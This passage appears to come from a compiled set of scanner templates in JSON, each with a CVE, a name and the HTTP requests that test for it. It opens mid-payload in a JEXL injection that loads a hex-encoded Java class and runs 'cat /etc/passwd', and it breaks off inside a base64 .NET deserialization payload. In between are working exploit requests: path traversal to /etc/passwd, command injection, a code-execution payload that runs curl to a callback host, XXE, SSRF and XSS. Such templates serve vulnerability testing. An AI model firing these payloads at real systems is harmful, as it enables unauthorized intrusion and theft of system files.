x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Social Warfare"]}]},{"raw":["GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3R